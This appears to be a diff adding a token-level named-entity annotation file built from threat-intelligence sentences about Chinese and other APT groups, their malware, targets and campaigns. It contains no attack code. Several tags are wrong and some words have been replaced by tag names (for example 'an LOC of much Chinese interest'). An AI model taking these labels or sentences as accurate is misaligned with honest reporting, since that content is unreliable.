+Gh0st E-MAL
+, O
+Poison B-MAL
+Ivy E-MAL
+and O
+Torn B-MAL
+RAT I-MAL
+malware E-MAL
+as O
+their O
+primary O
+attack O
+vector O
+is O
+sphere O
+phishing S-ACT
+. O
+
+Their O
+targets O
+are O
+marine B-IDTY
+companies E-IDTY
+that O
+operate O
+in O
+and O
+around O
+the O
+South B-LOC
+China I-LOC
+Sea E-LOC
+, O
+an O
+LOC O
+of O
+much O
+Chinese S-LOC
+interest O
+. O
+
+As O
+recently O
+as O
+this O
+past O
+week O
+, O
+researchers O
+observed O
+Chinese B-LOC
+hackers E-LOC
+escalating O
+cyber-attack O
+efforts O
+to O
+steal O
+military O
+research O
+secrets O
+from O
+US S-LOC
+universities S-IDTY
+. O
+
+The O
+cyber-espionage B-ACT
+campaign E-ACT
+has O
+labelled O
+the O
+group O
+Advanced B-APT
+Persistent E-APT
+Threat B-APT
+( I-APT
+APT I-APT
+) I-APT
+40 E-APT
+or O
+, O
+titled O
+, O
+Periscope S-APT
+. O
+
+The O
+group O
+has O
+been O
+active O
+since O
+at O
+least O
+January B-TIME
+2013 E-TIME
+. O
+
+The O
+group O
+has O
+also O
+targeted O
+businesses S-IDTY
+operating O
+in O
+the O
+South B-LOC
+China I-LOC
+Sea E-LOC
+, O
+which O
+is O
+a O
+strategically O
+important O
+region O
+and O
+the O
+focus O
+of O
+disputes O
+between O
+China O
+and O
+other O
+states O
+. O
+
+The O
+main O
+targets O
+seem O
+to O
+be O
+US B-LOC
+companies E-IDTY
+in O
+engineering S-IDTY
+, O
+transport S-IDTY
+and O
+defense S-IDTY
+, O
+although O
+it O
+has O
+targeted O
+other O
+organizations O
+around O
+the O
+world O
+. O
+
+The O
+times O
+of O
+day O
+the O
+group O
+is O
+active O
+also O
+suggests O
+that O
+it O
+is O
+based O
+near O
+Beijing O
+and O
+the O
+group O
+has O
+reportedly O
+used O
+malware O
+that O
+has O
+been O
+observed O
+in O
+other O
+Chinese B-LOC
+operations E-LOC
+, O
+indicating O
+some O
+level O
+of O
+collaboration O
+. O
+
+Periscope O
+'s O
+activity O
+has O
+previously O
+been O
+suspected O
+of O
+being O
+linked O
+to O
+China S-LOC
+, O
+but O
+now O
+researchers O
+believe O
+their O
+evidence O
+links O
+the O
+operation O
+to O
+the O
+Chinese S-LOC
+state O
+. O
+
+APT40 S-APT
+is O
+described O
+as O
+a O
+moderately O
+sophisticated O
+cyber-espionage O
+group O
+which O
+combines O
+access O
+to O
+significant O
+development O
+resources O
+with O
+the O
+ability O
+to O
+leverage O
+publicly B-MAL
+available I-MAL
+tools E-MAL
+. O
+
+Anchor O
+Panda O
+uses O
+website O
+and O
+web-server O
+compromise O
+as O
+a O
+means O
+of O
+attack O
+and O
+leverages O
+an O
+enormous O
+cache O
+of O
+tools O
+in O
+its O
+campaigns S-ACT
+, O
+to O
+include O
+exploits O
+that O
+take O
+advantage O
+of O
+known O
+CVE B-MAL
+software I-MAL
+vulnerabilities E-MAL
+. O
+
+Like O
+many O
+espionage B-ACT
+campaigns E-ACT
+, O
+much O
+of O
+APT40 S-APT
+'s O
+activity O
+begins O
+by O
+attempting O
+to O
+trick O
+targets O
+with O
+phishing B-ACT
+emails S-TOOL
+, O
+before O
+deploying O
+malware O
+such O
+as O
+the O
+Gh0st B-MAL
+RAT I-MAL
+trojan E-MAL
+to O
+maintain O
+persistence O
+on O
+a O
+compromised O
+network O
+. O
+
+The O
+group O
+uses O
+website O
+and O
+web-server O
+compromise O
+as O
+a O
+means O
+of O
+attack O
+and O
+leverages O
+an O
+enormous O
+cache O
+of O
+tools O
+in O
+its O
+campaigns S-ACT
+, O
+to O
+include O
+exploits O
+that O
+take O
+advantage O
+of O
+known O
+CVE B-MAL
+software I-MAL
+vulnerabilities E-MAL
+. O
+
+More O
+than O
+half O
+of O
+the O
+organizations O
+we O
+have O
+observed O
+being O
+targeted O
+or O
+breached O
+by O
+APT5 O
+operate O
+in O
+these O
+sectors O
+. O
+
+APT5 S-APT
+has O
+been O
+active O
+since O
+at O
+least O
+2007 S-TIME
+. O
+
+APT5 S-APT
+has O
+targeted O
+or O
+breached O
+organizations O
+across O
+multiple O
+industries O
+, O
+but O
+its O
+focus O
+appears O
+to O
+be O
+on O
+telecommunications S-IDTY
+and O
+technology B-IDTY
+companies E-IDTY
+, O
+especially O
+information O
+about O
+satellite B-IDTY
+communications E-IDTY
+. O
+
+APT5 S-APT
+targeted O
+the O
+network O
+of O
+an O
+electronics B-IDTY
+firm E-IDTY
+that O
+sells O
+products O
+for O
+both O
+industrial S-IDTY
+and O
+military S-IDTY
+applications O
+. O
+
+The O
+group O
+subsequently O
+stole O
+communications S-IDTY
+related O
+to O
+the O
+firm O
+'s O
+business O
+relationship O
+with O
+a O
+national O
+military S-IDTY
+, O
+including O
+inventories O
+and O
+memoranda O
+about O
+specific O
+products O
+they O
+provided O
+. O
+
+In O
+one O
+case O
+in O
+late B-TIME
+2014 E-TIME
+, O
+APT5 O
+breached O
+the O
+network O
+of O
+an O
+international B-IDTY
+telecommunications I-IDTY
+company E-IDTY
+. O
+
+The O
+group O
+used O
+malware O
+with O
+keylogging O
+capabilities O
+to O
+monitor O
+the O
+computer O
+of O
+an O
+executive O
+who O
+manages O
+the O
+company O
+'s O
+relationships O
+with O
+other O
+telecommunications B-IDTY
+companies E-IDTY
+. O
+
+APT5 O
+also O
+targeted O
+the O
+networks O
+of O
+some O
+of O
+Southeast O
+Asia S-LOC
+'s O
+major O
+telecommunications B-IDTY
+providers E-IDTY
+with O
+Leouncia S-MAL
+malware S-MAL
+. O
+
+We O
+suspect O
+that O
+the O
+group O
+sought O
+access O
+to O
+these O
+networks O
+to O
+obtain O
+information O
+that O
+would O
+enable O
+it O
+to O
+monitor O
+communications O
+passing O
+through O
+the O
+providers' O
+systems O
+. O
+
+The O
+FBI S-SECTEAM
+said O
+the O
+" O
+group O
+of I-APT
+malicious I-APT
+cyber I-APT
+actors E-APT
+" O
+( O
+known O
+as O
+APT6 S-APT
+or O
+1.php S-FILE
+) O
+used O
+dedicated O
+top-level O
+domains O
+in O
+conjunction O
+with O
+the O
+command O
+and O
+control O
+servers O
+to O
+deliver O
+" O
+customized B-MAL
+malicious I-MAL
+software E-MAL
+" O
+to O
+government O
+computer O
+systems O
+. O
+
+Deepen S-SECTEAM
+told O
+Threatpost O
+the O
+group O
+has O
+been O
+operating O
+since O
+at O
+least O
+since O
+2008 S-TIME
+and O
+has O
+targeted O
+China B-IDTY
+and I-IDTY
+US I-IDTY
+relations I-IDTY
+experts E-IDTY
+, O
+Defense B-SECTEAM
+Department E-SECTEAM
+entities O
+, O
+and O
+geospatial B-IDTY
+groups E-IDTY
+within O
+the O
+federal B-IDTY
+government E-IDTY
+. O
+
+Government B-IDTY
+officials E-IDTY
+said O
+they O
+knew O
+the O
+initial O
+attack O
+occurred O
+in O
+2011 S-TIME
+, O
+but O
+are O
+unaware O
+of O
+who O
+specifically O
+is O
+behind O
+the O
+attacks O
+. O
+
+According O
+to O
+Deepen S-SECTEAM
+, O
+APT6 S-APT
+has O
+been O
+using O
+spear B-ACT
+phishing E-ACT
+in O
+tandem O
+with O
+malicious O
+PDF S-MAL
+and O
+ZIP S-MAL
+attachments O
+or O
+links O
+to O
+malware O
+infected O
+websites O
+that O
+contains O
+a O
+malicious O
+SCR B-FILE
+file E-FILE
+. O
+
+Nearly O
+a O
+month O
+later O
+, O
+security O
+experts O
+are O
+now O
+shining O
+a O
+bright O
+light O
+on O
+the O
+alert O
+and O
+the O
+mysterious O
+group O
+behind O
+the O
+attack O
+. O
+
+The O
+attacks O
+discussed O
+in O
+this O
+blog O
+are O
+related O
+to O
+an O
+APT B-ACT
+campaign E-ACT
+commonly O
+referred O
+to O
+as O
+" O
+th3bug O
+" O
+, O
+named O
+for O
+the O
+password O
+the O
+actors O
+often O
+use O
+with O
+their O
+Poison B-MAL
+Ivy I-MAL
+malware E-MAL
+. O
+
+Over O
+the O
+summer O
+they O
+compromised O
+several O
+sites O
+, O
+including O
+a O
+well-known O
+Uyghur O
+website O
+written O
+in O
+that O
+native O
+language O
+. O
+
+In O
+contrast O
+to O
+many O
+other O
+APT B-ACT
+campaigns E-ACT
+, O
+which O
+tend O
+to O
+rely O
+heavily O
+on O
+spear B-ACT
+phishing E-ACT
+to O
+gain O
+victims O
+, O
+" O
+th3bug O
+" O
+is O
+known O
+for O
+compromising O
+legitimate O
+websites O
+their O
+intended O
+visitors O
+are O
+likely O
+to O
+frequent O
+. O
+
+While O
+we O
+were O
+unable O
+to O
+recover O
+the O
+initial O
+vulnerability O
+used O
+, O
+it O
+is O
+possibly O
+the O
+same O
+CVE-2014-0515 S-VULID
+Adobe B-TOOL
+Flash E-TOOL
+exploit S-VULNAME
+first O
+reported O
+by O
+Cisco B-SECTEAM
+TRAC E-SECTEAM
+in O
+late B-TIME
+July E-TIME
+. O
+
+However O
+, O
+to O
+increase O
+success O
+rates O
+APT20 S-APT
+can O
+use O
+zero-day S-VULNAME
+exploits O
+, O
+so O
+even O
+a O
+properly O
+patched O
+system O
+would O
+be O
+compromised O
+. O
+
+Our O
+direct O
+observation O
+of O
+in-the-wild O
+spearphishing B-ACT
+attacks E-ACT
+staged O
+by O
+the O
+Bahamut O
+group O
+have O
+been O
+solely O
+attempts O
+to O
+deceive O
+targets O
+into O
+providing O
+account O
+passwords O
+through O
+impersonation O
+of O
+notices O
+from O
+platform B-IDTY
+providers E-IDTY
+. O
+
+Bahamut O
+was O
+first O
+noticed O
+when O
+it O
+targeted O
+a O
+Middle B-IDTY
+Eastern I-IDTY
+human I-IDTY
+rights I-IDTY
+activist E-IDTY
+in O
+the O
+first O
+week O
+of O
+January B-TIME
+2017 E-TIME
+. O
+
+Later O
+that O
+month O
+, O
+the O
+same O
+tactics O
+and O
+patterns O
+were O
+seen O
+in O
+attempts O
+against O
+an O
+Iranian B-IDTY
+women I-IDTY
+'s I-IDTY
+activist E-IDTY
+– O
+an O
+individual S-IDTY
+commonly O
+targeted O
+by O
+Iranian B-LOC
+actors E-LOC
+, O
+such O
+as O
+Charming O
+Kitten O
+and O
+the O
+Sima B-ACT
+campaign E-ACT
+documented O
+in O
+our O
+2016 S-TIME
+Black O
+Hat O
+talk O
+. O
+
+In O
+June S-TIME
+we O
+published O
+on O
+a O
+previously O
+unknown O
+group O
+we O
+named O
+" O
+Bahamut S-APT
+" O
+, O
+a O
+strange O
+campaign O
+of O
+phishing S-ACT
+and O
+malware O
+apparently O
+focused O
+on O
+the O
+Middle B-LOC
+East E-LOC
+and O
+South B-LOC
+Asia E-LOC
+. O
+
+Once O
+inside O
+a O
+network O
+, O
+APT40 S-APT
+uses O
+credential-harvesting B-MAL
+tools E-MAL
+to O
+gain O
+usernames O
+and O
+passwords O
+, O
+allowing O
+it O
+to O
+expand O
+its O
+reach O
+across O
+the O
+network O
+and O
+move O
+laterally O
+through O
+an O
+environment O
+as O
+it O
+moves O
+to O
+towards O
+the O
+ultimate O
+goal O
+of O
+stealing O
+data O
+. O
+
+Bahamut S-APT
+was O
+shown O
+to O
+be O
+resourceful O
+, O
+not O
+only O
+maintaining O
+their O
+own O
+Android S-OS
+malware S-MAL
+but O
+running O
+propaganda O
+sites O
+, O
+although O
+the O
+quality O
+of O
+these O
+activities S-ACT
+varied O
+noticeably O
+. O
+
+In O
+June S-TIME
+we O
+published O
+on O
+a O
+previously O
+unknown O
+group O
+we O
+named O
+" O
+Bahamut S-APT
+" O
+, O
+a O
+strange O
+campaign O
+of O
+phishing S-ACT
+and O
+malware O
+apparently O
+focused O
+on O
+the O
+Middle B-LOC
+East E-LOC
+and O
+South B-LOC
+Asia E-LOC
+. O
+
+Several O
+times O
+, O
+APT5 S-APT
+has O
+targeted O
+organizations S-IDTY
+and O
+personnel S-IDTY
+based O
+in O
+Southeast B-LOC
+Asia E-LOC
+. O
+
+However O
+, O
+in O
+the O
+same O
+week O
+of O
+September O
+a O
+series O
+of O
+spearphishing S-ACT
+attempts O
+once O
+again O
+targeted O
+a O
+set O
+of O
+otherwise O
+unrelated O
+individuals O
+, O
+employing O
+the O
+same O
+tactics O
+as O
+before O
+. O
+
+Our O
+primary O
+contribution O
+in O
+this O
+update O
+is O
+to O
+implicate O
+Bahamut O
+in O
+what O
+are O
+likely O
+counterterrorism-motivated O
+surveillance O
+operations O
+, O
+and O
+to O
+further O
+affirm O
+our O
+belief O
+that O
+the O
+group O
+is O
+a O
+hacker-for-hire O
+operation O
+. O
+
+As O
+we O
+wrote O
+then O
+, O
+compared O
+to O
+Kingphish O
+, O
+Bahamut O
+operates O
+as O
+though O
+it O
+were O
+a O
+generation O
+ahead O
+in O
+terms O
+of O
+professionalism O
+and O
+ambition O
+. O
+
+In O
+the O
+Bahamut O
+report O
+, O
+we O
+discussed O
+two O
+domains S-MAL
+found O
+within O
+our O
+search O
+that O
+were O
+linked O
+with O
+a O
+custom B-MAL
+Android I-MAL
+malware I-MAL
+agent E-MAL
+. O
+
+After O
+the O
+publication O
+of O
+the O
+original O
+report O
+, O
+these O
+sites O
+were O
+taken O
+offline O
+despite O
+the O
+fact O
+that O
+one O
+agent O
+was O
+even O
+updated O
+a O
+six O
+days O
+prior O
+to O
+our O
+post O
+( O
+the O
+" O
+Khuai S-MAL
+" O
+application O
+) O
+. O
+
+FIF O
+is O
+notable O
+for O
+its O
+links O
+to O
+the O
+Lashkar-e-Taiba S-IDTY
+( O
+LeT S-IDTY
+) O
+terrorist O
+organization O
+, O
+which O
+has O
+committed O
+mass-casualty O
+attacks O
+in O
+India S-LOC
+in O
+support O
+of O
+establishing O
+Pakistani O
+control O
+over O
+the O
+disputed O
+Jammu O
+and O
+Kashmir O
+border O
+region O
+. O
+
+As O
+a O
+result O
+, O
+it O
+is O
+already O
+flagged O
+as O
+Bahamut O
+by O
+antivirus O
+engines O
+. O
+
+Our O
+initial O
+observation O
+of O
+the O
+Bahamut O
+group O
+originated O
+from O
+in-the-wild O
+attempts O
+to O
+deceive O
+targets O
+into O
+providing O
+account O
+passwords O
+through O
+impersonation O
+of O
+platform B-IDTY
+providers E-IDTY
+. O
+
+One O
+curious O
+trait O
+of O
+Bahamut O
+is O
+that O
+it O
+develops O
+fully-functional O
+applications O
+in O
+support O
+of O
+its O
+espionage O
+activities O
+, O
+rather O
+than O
+push O
+nonfunctional O
+fake O
+apps O
+or O
+bundle O
+malware O
+with O
+legitimate B-MAL
+software E-MAL
+. O
+
+Curiously O
+, O
+Bahamut O
+appears O
+to O
+track O
+password O
+attempts O
+in O
+response O
+to O
+failed O
+phishing S-ACT
+attempts O
+or O
+to O
+provoke O
+the O
+target O
+to O
+provide O
+more O
+passwords O
+. O
+
+Bahamut O
+spearphishing S-ACT
+attempts O
+have O
+also O
+been O
+accompanied O
+with O
+SMS O
+messages O
+purporting O
+to O
+be O
+from O
+Google S-IDTY
+about O
+security O
+issues O
+on O
+their O
+account O
+, O
+including O
+a O
+class O
+0 O
+message O
+or O
+" O
+Flash S-TOOL
+text O
+" O
+. O
+These O
+text O
+messages O
+did O
+not O
+include O
+links O
+but O
+are O
+intended O
+to O
+build O
+credibility O
+around O
+the O
+fake O
+service O
+notifications O
+later O
+sent O
+to O
+the O
+target O
+'s O
+email S-TOOL
+address O
+. O
+
+We O
+have O
+not O
+found O
+evidence O
+of O
+Bahamut S-APT
+engaging O
+in O
+crime O
+or O
+operating O
+outside O
+its O
+limited O
+geographic O
+domains O
+, O
+although O
+this O
+narrow O
+perspective O
+could O
+be O
+accounted O
+for O
+by O
+its O
+compartmentalization O
+of O
+operations O
+. O
+
+Thus O
+far O
+, O
+Bahamut S-APT
+'s O
+campaigns S-ACT
+have O
+appeared O
+to O
+be O
+primarily O
+espionage O
+or O
+information O
+operations O
+– O
+not O
+destructive B-ACT
+attacks E-ACT
+or O
+fraud O
+. O
+
+The O
+targets O
+and O
+themes O
+of O
+Bahamut O
+'s O
+campaigns S-ACT
+have O
+consistently O
+fallen O
+within O
+two O
+regions O
+– O
+South B-LOC
+Asia E-LOC
+( O
+primarily O
+Pakistan S-LOC
+, O
+specifically O
+Kashmir S-LOC
+) O
+and O
+the O
+Middle B-LOC
+East E-LOC
+( O
+from O
+Morocco S-LOC
+to O
+Iran S-LOC
+) O
+. O
+
+Our O
+prior O
+publication O
+also O
+failed O
+to O
+acknowledge O
+immensely O
+valuable O
+input O
+from O
+a O
+number O
+of O
+colleagues O
+, O
+including O
+Nadim O
+Kobeissi O
+'s O
+feedback O
+on O
+how O
+the O
+API O
+endpoints O
+on O
+the O
+Android S-OS
+malware S-MAL
+were O
+encrypted O
+. O
+
+Bahamut S-APT
+targeted O
+similar O
+Qatar-based S-LOC
+individuals O
+during O
+their O
+campaign O
+. O
+
+Bellingcat S-SECTEAM
+also O
+reported O
+the O
+domain O
+had O
+been O
+used O
+previously O
+to O
+host O
+potential O
+decoy B-FILE
+documents E-FILE
+as O
+detailed O
+in O
+VirusTotal S-TOOL
+here O
+using O
+http://voguextra.com/decoy.doc S-FILE
+. O
+
+The O
+China-backed O
+Barium S-APT
+APT O
+is O
+suspected O
+to O
+be O
+at O
+the O
+helm O
+of O
+the O
+project O
+. O
+
+Trojanized O
+versions O
+of O
+the O
+utility O
+were O
+then O
+signed O
+with O
+legitimate O
+certificates O
+and O
+were O
+hosted O
+on O
+and O
+distributed O
+from O
+official O
+ASUS O
+update O
+servers O
+– O
+which O
+made O
+them O
+mostly O
+invisible O
+to O
+the O
+vast O
+majority O
+of O
+protection O
+solutions O
+, O
+according O
+to O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+. O
+
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+To O
+compromise O
+the O
+utility O
+, O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+determined O
+that O
+the O
+cyberattackers O
+used O
+stolen O
+digital O
+certificates O
+used O
+by O
+ASUS O
+to O
+sign O
+legitimate O
+binaries O
+, O
+and O
+altered O
+older O
+versions O
+of O
+ASUS O
+software O
+to O
+inject O
+their O
+own O
+malicious O
+code O
+. O
+
+To O
+compromise O
+the O
+utility O
+, O
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+determined O
+that O
+Barium S-APT
+used O
+stolen O
+digital O
+certificates O
+used O
+by O
+ASUS O
+to O
+sign O
+legitimate O
+binaries O
+, O
+and O
+altered O
+older O
+versions O
+of O
+ASUS O
+software O
+to O
+inject O
+their O
+own O
+malicious O
+code O
+. O
+
+BARIUM S-APT
+, O
+a O
+Chinese B-LOC
+state E-LOC
+player O
+that O
+also O
+goes O
+by O
+APT17 S-APT
+, O
+Axiom S-APT
+and O
+Deputy S-APT
+Dog S-APT
+, O
+was O
+previously O
+linked O
+to O
+the O
+ShadowPad S-MAL
+and O
+CCleaner S-MAL
+incidents O
+, O
+which O
+were O
+also O
+supply-chain B-ACT
+attacks E-ACT
+that O
+used O
+software B-MAL
+updates E-MAL
+to O
+sneak O
+onto O
+machines O
+. O
+
+That O
+said O
+, O
+the O
+" O
+fingerprints O
+" O
+left O
+on O
+the O
+samples O
+by O
+the O
+attackers O
+– O
+including O
+techniques O
+used O
+to O
+achieve O
+unauthorized O
+code O
+execution O
+– O
+suggest O
+that O
+the O
+BARIUM B-APT
+APT E-APT
+is O
+behind O
+the O
+effort O
+, O
+according O
+to O
+the O
+researchers O
+. O
+
+In O
+the O
+2017 S-TIME
+ShadowPad B-ACT
+attack E-ACT
+, O
+the O
+update O
+mechanism O
+for O
+Korean S-LOC
+server B-IDTY
+management I-IDTY
+software I-IDTY
+provider E-IDTY
+NetSarang O
+was O
+compromised O
+to O
+serve O
+up O
+an O
+eponymous O
+backdoor O
+. O
+
+In O
+the O
+next O
+incident O
+, O
+also O
+in O
+2017 S-TIME
+, O
+software B-MAL
+updates E-MAL
+for O
+the O
+legitimate O
+computer O
+cleanup O
+tool O
+CCleaner O
+was O
+found O
+to O
+have O
+been O
+compromised O
+by O
+hackers O
+to O
+taint O
+them O
+with O
+the O
+same O
+ShadowPad B-MAL
+backdoor E-MAL
+. O
+
+NetSarang O
+, O
+which O
+has O
+headquarters O
+in O
+South B-LOC
+Korea E-LOC
+and O
+the O
+United B-LOC
+States E-LOC
+, O
+removed O
+the O
+backdoored O
+update O
+, O
+but O
+not O
+before O
+it O
+was O
+activated O
+on O
+at O
+least O
+one O
+victim O
+'s O
+machine O
+in O
+Hong B-LOC
+Kong E-LOC
+. O
+
+Given O
+our O
+increased O
+confidence O
+that O
+Bahamut O
+was O
+responsible O
+for O
+targeting O
+of O
+Qatari S-LOC
+labor B-IDTY
+rights I-IDTY
+advocates E-IDTY
+and O
+its O
+focus O
+on O
+the O
+foreign B-IDTY
+policy I-IDTY
+institutions E-IDTY
+other O
+Gulf O
+states O
+, O
+Bahamut O
+'s O
+interests O
+are O
+seemingly O
+too O
+expansive O
+to O
+be O
+limited O
+one O
+sponsor O
+or O
+customer O
+. O
+
+Barium S-APT
+specializes O
+in O
+targeting O
+high O
+value O
+organizations O
+holding O
+sensitive O
+data O
+, O
+by O
+gathering O
+extensive O
+information O
+about O
+their O
+employees S-IDTY
+through O
+publicly O
+available O
+information O
+and O
+social B-IDTY
+media E-IDTY
+, O
+using O
+that O
+information O
+to O
+fashion O
+phishing B-ACT
+attacks E-ACT
+intended O
+to O
+trickthose O
+employees S-IDTY
+into O
+compromising O
+their O
+computers O
+and O
+networks O
+. O
+
+We O
+identified O
+an O
+overlap O
+in O
+the O
+domain O
+voguextra.com O
+, O
+which O
+was O
+used O
+by O
+Bahamut S-APT
+within O
+their O
+" O
+Devoted B-FILE
+To I-FILE
+Humanity E-FILE
+" O
+app O
+to O
+host O
+an O
+image O
+file O
+and O
+as O
+C2 S-TOOL
+server O
+by O
+the O
+PrayTime O
+iOS O
+app O
+mentioned O
+in O
+our O
+first O
+post O
+. O
+
+Althoughthe O
+BariumDefendants O
+have O
+relied O
+on O
+differentand O
+distinct O
+infrastructures O
+in O
+an O
+effortto O
+evade O
+detection O
+, O
+Bariumused O
+the O
+same O
+e-mail S-TOOL
+address O
+( O
+hostay88@gmail.com S-EMAIL
+) O
+to O
+register O
+malicious O
+domains O
+used O
+in O
+connection O
+with O
+at O
+least O
+two O
+toolsets O
+that O
+Barium S-APT
+has O
+employed O
+to O
+compromise O
+victim O
+computers O
+. O
+
+The O
+second O
+method O
+, O
+described O
+in O
+Part O
+D.2 O
+, O
+below O
+, O
+involves O
+the O
+" O
+ShadowPad S-MAL
+" O
+malware O
+, O
+which O
+the O
+Barium S-APT
+Defendants O
+have O
+distributed O
+via O
+a O
+third-party B-IDTY
+software I-IDTY
+provider E-IDTY
+'s O
+compromised O
+update O
+. O
+
+To O
+enhance O
+the O
+effectiveness O
+of O
+phishing B-ACT
+attacks E-ACT
+into O
+the O
+organization O
+, O
+Barium S-APT
+will O
+collect O
+additional O
+background O
+informationfrom O
+social B-IDTY
+media E-IDTY
+sites O
+. O
+
+Employing O
+a O
+technique O
+known O
+as O
+" O
+spear B-ACT
+phishing E-ACT
+" O
+, O
+Barium S-APT
+has O
+heavily O
+targeted O
+individuals O
+within O
+HumanResources O
+or O
+Business O
+Developmentdepartments O
+ofthe O
+targeted O
+organizations O
+in O
+order O
+to O
+compromise O
+the O
+computers O
+ofsuch O
+individuals O
+. O
+
+The O
+first O
+method O
+, O
+described O
+in O
+Part O
+D.l O
+, O
+below O
+, O
+involves O
+the O
+" O
+Barlaiy S-MAL
+" O
+and O
+" O
+PlugXL S-MAL
+" O
+malware O
+, O
+which O
+the O
+Barium S-APT
+Defendants O
+propagate O
+using O
+phishing B-ACT
+techniques E-ACT
+. O
+
+Using O
+the O
+information O
+gathered O
+from O
+its O
+reconnaissance O
+on O
+social B-IDTY
+media E-IDTY
+sites O
+, O
+Barium S-APT
+packages O
+the O
+phishing B-ACT
+e-mail E-ACT
+in O
+a O
+ACT O
+that O
+gives O
+the O
+e-mail S-TOOL
+credibility O
+to O
+the O
+target O
+user O
+, O
+often O
+by O
+making O
+the O
+e-mail S-TOOL
+appear O
+as O
+ifit O
+were O
+sent O
+from O
+an O
+organization O
+known O
+to O
+and O
+trusted O
+by O
+the O
+victim O
+or O
+concerning O
+a O
+topic O
+of O
+interest O
+to O
+the O
+victim O
+. O
+
+Barium S-APT
+Defendants O
+install O
+the O
+malicious O
+" O
+Win32/Barlaiy S-MAL
+" O
+malware O
+and O
+the O
+malicious O
+" O
+Win32/PlugX.L S-MAL
+" O
+malware O
+on O
+victim O
+computers O
+using O
+the O
+means O
+described O
+above O
+. O
+
+Both O
+Win32/Barlaiy S-MAL
+& O
+Win32/PlugX.L S-MAL
+are O
+remote O
+access O
+" O
+trojans O
+" O
+, O
+which O
+allow O
+Barium S-APT
+to O
+gather O
+a O
+victim O
+'s O
+information O
+, O
+control O
+a O
+victim O
+'s O
+device O
+, O
+install O
+additional O
+malware O
+, O
+and O
+exfiltrate O
+information O
+fi-om O
+a O
+victim O
+'s O
+device O
+. O
+
+Barium S-APT
+Defendants O
+install O
+the O
+malicious O
+credential O
+stealing O
+and O
+injection O
+tool O
+known O
+as O
+" O
+Win32/RibDoor.A!dha S-MAL
+" O
+. O
+
+While O
+not O
+detected O
+at O
+the O
+time O
+, O
+Microsoft S-IDTY
+'s O
+antivirus O
+and O
+security O
+products O
+now O
+detect O
+this O
+Barium S-APT
+malicious O
+file O
+and O
+flag O
+the O
+file O
+as O
+" O
+Win32/ShadowPad.A S-FILE
+" O
+. O
+
+MXI B-FILE
+Player E-FILE
+appears O
+to O
+be O
+a O
+version O
+of O
+the O
+Bahamut O
+agent O
+, O
+designed O
+to O
+record O
+the O
+phone O
+calls O
+and O
+collect O
+other O
+information O
+about O
+the O
+user O
+( O
+com.mxi.videoplay S-DOM
+) O
+. O
+
+Figure O
+9a O
+, O
+below O
+, O
+shows O
+detections O
+of O
+encounters O
+with O
+the O
+Barium S-APT
+actors O
+and O
+their O
+infrastructure O
+, O
+including O
+infected O
+computers O
+located O
+in O
+Virginia O
+, O
+and O
+Figure O
+9b O
+, O
+below O
+, O
+shows O
+detections O
+of O
+encounters O
+throughout O
+the O
+United B-LOC
+States E-LOC
+. O
+
+Barium S-APT
+has O
+targeted O
+Microsoft B-IDTY
+customers E-IDTY
+both O
+in O
+Virginia O
+, O
+the O
+United O
+States O
+, O
+and O
+around O
+the O
+world O
+. O
+
+Once O
+the O
+Barium S-APT
+Defendants O
+have O
+access O
+to O
+a O
+victim O
+computer O
+through O
+the O
+malware O
+described O
+above O
+, O
+they O
+monitor O
+the O
+victim O
+'s O
+activity O
+and O
+ultimately O
+search O
+for O
+and O
+steal O
+sensitive O
+documents O
+( O
+for O
+example O
+, O
+Exfiltration S-ACT
+of O
+intellectual O
+property O
+regarding O
+technology S-IDTY
+has O
+been O
+seen O
+) O
+, O
+and O
+personal O
+information O
+fi"om O
+the O
+victim O
+'s O
+network O
+. O
+
+According O
+to O
+a O
+49-page O
+report O
+published O
+Thursday O
+, O
+all O
+of O
+the O
+attacks O
+are O
+the O
+work B-LOC
+of I-LOC
+Chinese I-LOC
+government I-LOC
+'s I-LOC
+intelligence I-LOC
+apparatus E-LOC
+, O
+which O
+the O
+report O
+'s O
+authors O
+dub O
+the O
+Winnti B-APT
+Umbrella E-APT
+. O
+
+Researchers O
+from O
+various O
+security O
+organizations O
+have O
+used O
+a O
+variety O
+of O
+names O
+to O
+assign O
+responsibility O
+for O
+the O
+hacks O
+, O
+including O
+LEAD S-APT
+, O
+BARIUM S-APT
+, O
+Wicked B-APT
+Panda E-APT
+, O
+GREF S-APT
+, O
+PassCV S-APT
+, O
+Axiom S-APT
+, O
+and O
+Winnti S-APT
+. O
+
+It O
+targets O
+organizations O
+in O
+Japan E-LOC
+, O
+South B-LOC
+Korea E-LOC
+, O
+and O
+Taiwan S-LOC
+, O
+leveling O
+its O
+attacks O
+on O
+public B-IDTY
+sector I-IDTY
+agencies E-IDTY
+and O
+telecommunications S-IDTY
+and O
+other O
+high-technology B-IDTY
+industries E-IDTY
+. O
+
+In O
+2016 S-TIME
+, O
+for O
+instance O
+, O
+we O
+found O
+their O
+campaigns S-ACT
+attacking O
+Japanese O
+organizations O
+with O
+various O
+malware O
+tools O
+, O
+notably O
+the O
+Elirks B-MAL
+backdoor E-MAL
+. O
+
+Blackgear O
+has O
+been O
+targeting O
+various O
+industries O
+since O
+its O
+emergence O
+a O
+decade O
+ago O
+. O
+
+Blackgear O
+'s O
+campaigns S-ACT
+also O
+use O
+email S-ACT
+as O
+an O
+entry O
+point O
+, O
+which O
+is O
+why O
+it's O
+important O
+to O
+secure O
+the O
+email B-ACT
+gateACT E-ACT
+. O
+
+BLACKGEAR S-ACT
+is O
+an O
+espionage B-ACT
+campaign E-ACT
+which O
+has O
+targeted O
+users S-IDTY
+in O
+Taiwan S-LOC
+for O
+many O
+years O
+. O
+
+Our O
+research O
+indicates O
+that O
+it O
+has O
+started O
+targeting O
+Japanese B-IDTY
+users E-IDTY
+. O
+
+The O
+malware O
+tools O
+used O
+by O
+BLACKGEAR S-ACT
+can O
+be O
+categorized O
+into O
+three O
+categories O
+: O
+binders S-MAL
+, O
+downloaders S-MAL
+and O
+backdoors S-MAL
+. O
+
+Binders S-MAL
+are O
+delivered O
+by O
+attack O
+vectors O
+( O
+such O
+as O
+phishing S-ACT
+and O
+watering B-ACT
+hole I-ACT
+attacks E-ACT
+) O
+onto O
+a O
+machine O
+. O
+
+Based O
+on O
+the O
+mutexes O
+and O
+domain O
+names O
+of O
+some O
+of O
+their O
+C&C S-TOOL
+servers O
+, O
+BlackTech O
+'s O
+campaigns S-ACT
+are O
+likely O
+designed O
+to O
+steal O
+their O
+target O
+'s O
+technology O
+. O
+
+Following O
+their O
+activities S-ACT
+and O
+evolving O
+tactics O
